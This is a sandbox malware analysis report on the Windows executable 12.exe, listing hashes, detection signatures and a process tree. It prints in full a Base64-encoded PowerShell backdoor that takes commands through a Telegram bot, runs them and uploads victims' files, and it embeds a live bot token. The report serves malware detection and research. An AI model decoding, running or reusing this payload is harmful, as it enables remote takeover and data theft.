Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12.exe

Overview

General Information

Sample name:12.exe
Analysis ID:1590581
MD5:90f2ca0a38d6e5416ee2f6be6326521d
SHA1:00bf14e8153778835f95b9255ae1658e37819f8d
SHA256:6534d5fd803f9c85bec3a820cef54f953e8643f3a4e16677d11decbf1a5b54c7
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 12.exe (PID: 6604 cmdline: "C:\Users\user\Desktop\12.exe" MD5: 90F2CA0A38D6E5416EE2F6BE6326521D)
    • powershell.exe (PID: 6648 cmdline: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAVQBSAEkAIAA+ACAAJABuAHUAbABsAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQARgBpAGwAZQBQAGEAdABoAA0ACgAgACAAIAAgACkADQAKACAAIAAgACAAQQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAA0ACgAgACAAIAAgACQARgBpAGUAbABkAE4AYQBtAGUAIAA9ACAAJwBkAG8AYwB1AG0AZQBuAHQAJwANAAoAIAAgACAAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAALgBIAHQAdABwAEMAbABpAGUAbgB0AEgAYQBuAGQAbABlAHIADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAEgAdAB0AHAAYwBsAGkAZQBuAHQAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgANAAoADQAKACAAIAAgACAAJABGAGkAbABlAFMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AOgA6AG4AZQB3ACgAJABGAGkAbABlAFAAYQB0AGgALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE0AbwBkAGUAXQA6ADoATwBwAGUAbgApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuAEgAZQBhAGQAZQByAFYAYQBsAHUAZQBdADoAOgBuAGUAdwAoACcAZgBvAHIAbQAtAGQAYQB0AGEAJwApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAuAE4AYQBtAGUAIAA9ACAAJABGAGkAZQBsAGQATgBhAG0AZQANAAoAIAAgACAAIAAkAEYAaQBsAGUASABlAGEAZABlAHIALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAKABTAHAAbABpAHQALQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAtAGwAZQBhAGYAKQANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4AUwB0AHIAZQBhAG0AQwBvAG4AdABlAG4AdABdADoAOgBuAGUAdwAoACQARgBpAGwAZQBTAHQAcgBlAGEAbQApAA0ACgAgACAAIAAgACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0AC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuACAAPQAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAuAEgAZQBhAGQAZQByAHMALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ATQBpAG0AZQBNAGEAcABwAGkAbgBnAF0AOgA6AEcAZQB0AE0AaQBtAGUATQBhAHAAcABpAG4AZwAoACQARgBpAGwAZQBQAGEAdABoACkAIAANAAoAIAAgACAAIAANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAE0AdQBsAHQAaQBwAGEAcgB0AEYAbwByAG0ARABhAHQAYQBDAG8AbgB0AGUAbgB0AF0AOgA6AG4AZQB3ACgAKQANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQALgBBAGQAZAAoACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0ACkADQAKACAAIAAgACAADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0AC4AUABvAHMAdABBAHMAeQBuAGMAKAAiACQAVQBSAEwALwBzAGUAbgBkAEQAbwBjAHUAbQBlAG4AdAA/AGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AIgAsACAAJABNAHUAbAB0AGkAcABhAHIAdABDAG8AbgB0AGUAbgB0ACkAIAA+ACAAJABuAHUAbABsAA0ACgB9AA0ACgANAAoAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUAIAA9ACAASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBNAGUAdABoAG8AZAAgAEcAZQB0ACAALQBVAHIAaQAgACgAJABVAFIATAAgACsAJwAvAGcAZQB0AFUAcABkAGEAdABlAHMAPwBvAGYAZgBzAGUAdAA9ACcAIAArACAAKAAkAGwAYQBzAHQASQBEACAAKwAgADEAKQApACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgACQAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAMQAwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAGMAbwBuAHQAaQBuAHUAZQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUALgByAGUAcwB1AGwAdAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB1AHAAZABhAHQAZQBpAGQAIAA9ACAAJABfAC4AdQBwAGQAYQB0AGUAXwBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGYAcgBvAG0AIAA9ACAAJABfAC4AbQBlAHMAcwBhAGcAZQAuAGYAcgBvAG0ALgBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAXwAuAG0AZQBzAHMAYQBnAGUALgB0AGUAeAB0ACkAKQANAAoADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADYAKQAgAC0AZQBxACAAIgAvAHMAbABlAGUAcAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIABbAGkAbgB0AF0AJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADQAKQAgAC0AZQBxACAAIgAvAGMAbQBkACIAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA1ACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AQgBvAHQAQwBtAGQAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAGMAbwBtAG0AYQBuAGQADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADkAKQAgAC0AZQBxACAAIgAvAGQAbwB3AG4AbABvAGEAZAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABGAGkAbABlAFAAYQB0AGgAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAG0AZAAgAD0AIAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADEALAAgADUAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABpAGQAZQBuAHQAaQBmAGkAZQByACAALQBlAHEAIAAkAGMAbQBkACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUwBMAEUARQBQACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAJAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAAxADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAkAHMAbABlAGUAcABUAGkAbQBlAA0ACgB9AA=='" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 3272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 1780 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7320 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1636,i,11664794565421518283,13165857320494331314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAVQBSAEkAIAA+ACAAJABuAHUAbABsAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQARgBpAGwAZQBQAGEAdABoAA0ACgAgACAAIAAgACkADQAKACAAIAAgACAAQQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAA0ACgAgACAAIAAgACQARgBpAGUAbABkAE4AYQBtAGUAIAA9ACAAJwBkAG8AYwB1AG0AZQBuAHQAJwANAAoAIAAgACAAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAALgBIAHQAdABwAEMAbABpAGUAbgB0AEgAYQBuAGQAbABlAHIADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAEgAdAB0AHAAYwBsAGkAZQBuAHQAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgANAAoADQAKACAAIAAgACAAJABGAGkAbABlAFMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AOgA6AG4AZQB3ACgAJABGAGkAbABlAFAAYQB0AGgALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE0AbwBkAGUAXQA6ADoATwBwAGUAbgApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuAEgAZQBhAGQAZQByAFYAYQBsAHUAZQBdADoAOgBuAGUAdwAoACcAZgBvAHIAbQAtAGQAYQB0AGEAJwApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAuAE4AYQBtAGUAIAA9ACAAJABGAGkAZQBsAGQATgBhAG0AZQANAAoAIAAgACAAIAAkAEYAaQBsAGUASABlAGEAZABlAHIALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAKABTAHAAbABpAHQALQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAtAGwAZQBhAGYAKQANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4AUwB0AHIAZQBhAG0AQwBvAG4AdABlAG4AdABdADoAOgBuAGUAdwAoACQARgBpAGwAZQBTAHQAcgBlAGEAbQApAA0ACgAgACAAIAAgACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0AC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuACAAPQAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgANAAoAIAAgA